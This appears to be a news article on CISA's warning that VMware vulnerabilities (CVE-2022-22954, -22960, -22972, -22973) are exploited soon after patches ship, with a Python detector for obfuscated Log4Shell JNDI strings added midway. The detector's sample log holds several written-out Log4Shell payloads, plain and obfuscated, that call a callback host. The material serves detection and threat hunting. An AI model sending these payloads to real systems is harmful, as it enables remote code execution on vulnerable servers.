VMware vulnerabilities resurface after attackers reverse-engineered patches within two days

Vulnerabilities in VMware products are back in the spotlight as threat actors turned the April security updates into a working exploit within 48 hours.

Persisting concern: CISA expects threat actors to reverse-engineer the new patches just as quickly, undermining their effectiveness for organizations that do not apply them immediately.

Breaking News: Multiple VMware Vulnerabilities Exploited by Threat Actors

The Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that two VMware vulnerabilities disclosed in April (CVE-2022-22954 and CVE-2022-22960) are being exploited in the wild. The exploitation, attributed to multiple threat actors, is a particular concern for organizations running affected VMware products that are reachable from the internet.

Since the April patches were released, numerous organizations have been targeted by threat actors exploiting these vulnerabilities. The available sources do not name the affected organizations, but CISA urges every enterprise running the affected products to assume it has been compromised and to begin threat hunting immediately rather than waiting for evidence of intrusion.

The two newly disclosed flaws are an authentication bypass, CVE-2022-22972, with a CVSS score of 9.8, and a local privilege escalation, CVE-2022-22973, with a score of 7.8. VMware disclosed both on May 18, and CISA expects malicious cyber actors to exploit them quickly, as they did the April vulnerabilities.

According to CISA, threat actors reverse-engineered VMware's April patches and had a working exploit within 48 hours of their release. Enterprises and government agencies that detect a potential compromise are advised to follow the incident response guidance in CISA's cybersecurity advisory.

One of the most notable earlier incidents occurred in January 2022, when threat actors installed Cobalt Strike implants on multiple VMware Horizon servers. In the same month, threat actors exploited the Log4Shell vulnerability in VMware Horizon to deploy web shells.
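The Log4Shell exploitation against Horizon mentioned above is driven by JNDI lookup strings that attackers hide behind nested Log4j lookups such as `${lower:j}` and `${::-j}`. The detector below, an added example that is not code from the original page, CISA, or VMware, normalizes those lookups before matching so that obfuscated variants are caught along with the plain `${jndi:...}` form. The log lines and IP addresses are constructed for the example; the log format and the assumption that the lookup arrives in a request header such as User-Agent are illustrative, not taken from the page.

```python
import re

# Constructed sample lines in Apache/NCSA combined-log style, as a reverse proxy
# in front of a Horizon server might record them. Not real data, not from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:08:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2022:08:02:40 +0000] "GET /portal/info.jsp HTTP/1.1" 200 77 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Jan/2022:08:02:41 +0000] "GET /portal/info.jsp HTTP/1.1" 200 77 "-" "${${lower:j}${lower:n}di:${lower:l}dap://198.51.100.7:1389/b}"
10.0.0.9 - - [10/Jan/2022:08:02:42 +0000] "GET /portal/info.jsp HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"
10.0.0.9 - - [10/Jan/2022:08:02:43 +0000] "GET /portal/info.jsp HTTP/1.1" 200 77 "-" "${jndi:${lower:ldap}://198.51.100.7/d}"
10.0.0.11 - - [10/Jan/2022:08:03:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""

# Innermost ${...} lookup: a body with no nested $, { or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup, regardless of case.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate one Log4j lookup body the way the vulnerable library would.

    Handles the obfuscation primitives seen in the wild: the default-value
    syntax `key:-value` (including the empty-key form `::-value`) and the
    lower/upper case converters. Returns None for lookups we do not model,
    which are left untouched so a real ${jndi:...} survives normalization.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match: re.Match) -> str:
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def find_jndi(line: str):
    """Return the de-obfuscated ${jndi:...} string in a line, or None."""
    match = JNDI_LOOKUP.search(normalize(line))
    return match.group(0) if match else None


def scan(log_text: str):
    """Yield (line_number, source_ip, normalized_lookup) for every hit."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        lookup = find_jndi(line)
        if lookup:
            source_ip = line.split(" ", 1)[0]
            hits.append((number, source_ip, lookup))
    return hits


if __name__ == "__main__":
    for number, source_ip, lookup in scan(SAMPLE_LOG):
        print(f"line {number}: {source_ip} sent {lookup}")
```

Running the block against the constructed sample flags lines 2 to 5 from 10.0.0.9 and reports each one as its resolved `${jndi:...}` form, so the callback host (198.51.100.7 here) can be pulled out for blocking and pivoting even when the original request was obfuscated. Lookup types the normalizer does not model, such as `${date:...}`, are left in place and will hide a lookup nested inside them; extend `_resolve` if you see those in your own logs.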

In response to these threats, CISA has encouraged enterprises to use the indicators and detection guidance in the updated advisory to hunt for signs of post-exploitation activity and to report incidents to the agency. It has also directed all 101 federal civilian executive branch agencies to identify every instance of the affected VMware products and either deploy the pair of patches that VMware released in its security advisory on Wednesday, May 18, or remove those instances from their networks.

Impacted VMware products include Workspace ONE Access, Identity Manager, vRealize Automation, Cloud Foundation, vRealize Suite Lifecycle Manager, NSX, vRealize Operations, vRealize Log Insight, and vRealize Network Insight.

This is the latest chapter in an ongoing security saga for VMware, a vendor whose products threat actors have targeted repeatedly over the last year. Organizations using the affected products are urged to patch promptly, hunt for signs of compromise, and stay vigilant.
